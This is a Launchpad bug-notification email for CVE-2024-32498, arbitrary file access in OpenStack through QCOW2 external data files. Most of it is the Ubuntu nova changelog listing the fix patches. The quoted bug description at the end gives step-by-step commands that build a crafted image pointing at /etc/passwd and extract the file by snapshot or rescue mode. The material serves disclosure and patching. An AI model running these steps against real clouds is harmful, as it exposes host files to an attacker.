[Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

James Page 2059809 at bugs.launchpad.net
Mon Jul 8 13:07:21 UTC 2024 

This bug was fixed in the package nova - 3:25.2.1-0ubuntu2.3~cloud0
---------------

 nova (3:25.2.1-0ubuntu2.3~cloud0) focal; urgency=medium
 .
   * SECURITY UPDATE for Ubuntu Cloud Archive. backport to focal.
 .
 nova (3:25.2.1-0ubuntu2.3) jammy-security; urgency=medium
 .
   * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
     (LP: #2059809)
     - debian/patches/CVE-2024-32498-pre1.patch: consolidate
       create_cow_image and create_image.
     - debian/patches/CVE-2024-32498-1.patch: reject qcow files with
       data-file attributes.
     - debian/patches/CVE-2024-32498-2.patch: check images with
       format_inspector for safety.
     - debian/patches/CVE-2024-32498-3.patch: additional qemu safety
       checking on base images.
     - debian/patches/CVE-2024-32498-4.patch: fix vmdk_allowed_types
       checking.
     - CVE-2024-32498
 .
 nova (3:25.2.1-0ubuntu2) jammy; urgency=medium
 .
   * d/p/libvirt-remove-default-cputune-shares-value.patch:
     Enable launch of instances with more than 9 CPUs on Jammy
     (LP: #1978489).
 .
 nova (3:25.2.1-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2037332).
 .
 nova (3:25.2.0-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2025503).
   * d/p/CVE-2023-2088-*.patch: Dropped. Fixed in point release.
 .
 nova (3:25.1.1-0ubuntu1.1) jammy-security; urgency=medium
 .
   * SECURITY UPDATE: Unauthorized File Access (LP: #2021980)
     - debian/patches/CVE-2023-2088-1.patch: Use force=True for os-brick
       disconnect during delete.
     - debian/patches/CVE-2023-2088-2.patch: Enable use of service user
       token with admin context.
     - CVE-2023-2088
 .
 nova (3:25.1.1-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2019759).
   * d/p/ignore-deleted-server-groups-in-validation.patch: Dropped. Fixed
     in stable point release.
 .
 nova (3:25.1.0-0ubuntu2.2) jammy-security; urgency=medium
 .
   * SECURITY REGRESSION: Regressions in other projects (LP: #2020111)
     - debian/patches/series: Do not apply CVE-2023-2088.patch until
       patches are ready for all upstream OpenStack projects.
     - CVE-2023-2088
 .
 nova (3:25.1.0-0ubuntu2.1) jammy-security; urgency=medium
 .
   * SECURITY UPDATE: Unauthorized File Access
     - debian/patches/CVE-2023-2088.patch: Use force=True for os-brick
       disconnect during delete.
     - CVE-2023-2088
 .
 nova (3:25.1.0-0ubuntu2) jammy; urgency=medium
 .
   * Backport fix to ignore deleted server groups (LP: #1890244)
     d/p/ignore-deleted-server-groups-in-validation.patch
 .
 nova (3:25.1.0-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2004030).
 .
 nova (3:25.0.1-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #1980369).
 .
 nova (3:25.0.0-0ubuntu1.1) jammy; urgency=medium
 .
   [ Corey Bryant ]
   * d/gbp.conf: Create stable/yoga branch.
 .
   [ Felipe Reyes ]
   * d/nova-common.postinst: Don't change file permissions under
     /var/lib/nova/.ssh (LP: #1904580).
 .
 nova (3:25.0.0-0ubuntu1) jammy; urgency=medium
 .
   * d/watch: Scope to 25.x series
   * New upstream release for OpenStack Yoga.
 .
 nova (3:24.0.0+git2022030310.3f274c65cc-0ubuntu2) jammy; urgency=medium
 .
   * d/control: Drop min version of python3-testtools to 2.4.0.
 .
 nova (3:24.0.0+git2022030310.3f274c65cc-0ubuntu1) jammy; urgency=medium
 .
   * New upstream snapshot for OpenStack Yoga.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (3:24.0.0+git2022011217.ea3945f71c-0ubuntu1) jammy; urgency=medium
 .
   * New upstream snapshot for OpenStack Yoga.
   * d/control, d/rules: Bump debhelper compat to 13.
 .
 nova (3:24.0.0+git2021120815.755aa11e0c-0ubuntu1) jammy; urgency=medium
 .
   * New upstream snapshot for OpenStack Yoga.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (3:24.0.0-0ubuntu1) impish; urgency=medium
 .
   * d/watch: Scope to 24.x series
   * New upstream release for OpenStack Xena.
 .
 nova (3:23.0.2+git2021090912.edaaa97d99-0ubuntu1) impish; urgency=medium
 .
   * New upstream snapshot for OpenStack Xena.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/arm-console-patch.patch: Rebased.
 .
 nova (3:23.0.2+git2021072117.3545356ae3-0ubuntu1) impish; urgency=medium
 .
   * New upstream snapshot for OpenStack Xena.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (3:23.0.1+git2021061405.052cf96358-0ubuntu2) impish; urgency=medium
 .
   * d/nova-compute-ironic.conf: Use the correct compute_driver for
     ironic (LP: #1934533).
   * d/t/nova-compute-daemons: Add nova-compute-ironic to test.
 .
 nova (3:23.0.1+git2021061405.052cf96358-0ubuntu1) impish; urgency=medium
 .
   * New upstream snapshot for OpenStack Xena.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (3:23.0.0-0ubuntu1) hirsute; urgency=medium
 .
   * New upstream release for OpenStack Wallaby.
 .
 nova (3:23.0.0~rc2-0ubuntu1) hirsute; urgency=medium
 .
   * New upstream release candidate for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (3:23.0.0~rc1-0ubuntu1) hirsute; urgency=medium
 .
   * d/control: Remove unnecessary dh-systemd Build-Depend
   * d/watch: Scope to 23.x series
   * New upstream release candidate for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (3:22.1.0+git2021030407.0226f9dd63-0ubuntu1) hirsute; urgency=medium
 .
   * New upstream snapshot for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (3:22.0.1+git2021012713.d92c0740c6-0ubuntu1) hirsute; urgency=medium
 .
   [ Corey Bryant ]
   * d/control: Drop mox3 inline with upstream.
 .
   [ Chris MacNaughton ]
   * New upstream snapshot for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/arm-console-patch.patch: Refreshed.
 .
 nova (3:22.0.1+git2020121010.3a6c1cbc3a-0ubuntu1) hirsute; urgency=medium
 .
   * Increment epoch to align with new snapshot plan.
   * New upstream snapshot for OpenStack Wallaby.
 .
 nova (2:23.0.0~b1~git2020120312.f0efcae697-0ubuntu2) hirsute; urgency=medium
 .
   * New upstream snapshot for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (2:22.0.0-0ubuntu1) groovy; urgency=medium
 .
   * New upstream release for OpenStack Victoria.
 .
 nova (2:22.0.0~rc1-0ubuntu1) groovy; urgency=medium
 .
   [ Chris MacNaughton ]
   * d/control: Update VCS paths for move to lp:~ubuntu-openstack-dev.
   * d/watch: Scope to 22.x series.
 .
   [ Corey Bryant ]
   * New upstream release candidate for OpenStack Victoria.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (2:22.0.0~b3~git2020091410.76b2fbd90e-0ubuntu3) groovy; urgency=medium
 .
   * d/nova-compute-libvirt.postinst: Ensure libvirt-qemu user is removed
     from nova group on package upgrade (LP: #1896617).
 .
 nova (2:22.0.0~b3~git2020091410.76b2fbd90e-0ubuntu2) groovy; urgency=medium
 .
   * d/nova-compute-libvirt.postinst: Drop libvirt-qemu user from nova group.
     This is no longer needed with recent /var/lib/nova permission changes and
     causes live snapshots to fail (LP: #1896617).
 .
 nova (2:22.0.0~b3~git2020091410.76b2fbd90e-0ubuntu1) groovy; urgency=medium
 .
   * New upstream snapshot for OpenStack Victoria.
   * d/control: Align (Build-)Depends with upstream.
 .
 nova (2:22.0.0~b2~git2020073014.2f3a380c3c-0ubuntu2) groovy; urgency=medium
 .
   [ Chris MacNaughton ]
   * d/control: Remove Breaks/Replaces that are older than Focal (LP: #1878419).
 .
   [ Corey Bryant ]
   * d/control, d/nova-compute-ironic.conf, d/rules: Add nova-compute-ironic
     binary package.
 .
 nova (2:22.0.0~b2~git2020073014.2f3a380c3c-0ubuntu1) groovy; urgency=medium
 .
   * New upstream snapshot for OpenStack Victoria.
   * d/control: Drop min version of openstack-pkg-tools.
   * d/control: Update Standards-Version to 4.5.0.
 .
 nova (2:22.0.0~b1~git2020070713.bc784a1c1f-0ubuntu1) groovy; urgency=medium
 .
   * New upstream snapshot for OpenStack Victoria.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/add-mysql8-compatibility.patch: Removed. Change landed upstream.
   * d/p/arm-console-patch.patch: Refreshed.
   * d/p/drop-sphinxcontrib-rsvgconverter.patch: Refreshed

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder:
  Fix Released
Status in Ubuntu Cloud Archive:
  Fix Released
Status in Ubuntu Cloud Archive antelope series:
  Fix Released
Status in Ubuntu Cloud Archive bobcat series:
  Fix Released
Status in Ubuntu Cloud Archive caracal series:
  Fix Released
Status in Ubuntu Cloud Archive ussuri series:
  Fix Committed
Status in Ubuntu Cloud Archive yoga series:
  Fix Released
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
  QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

  Steps to Reproduce:

  - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
  - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
  - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
  - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
  - Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0

  Option 2: (this is untested because I reproduced it only in a production system)
  - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
  - Go to the Dashboard, open the console of the instance and login to the instance.
  - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
  - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions

More information about the Ubuntu-openstack-bugs mailing list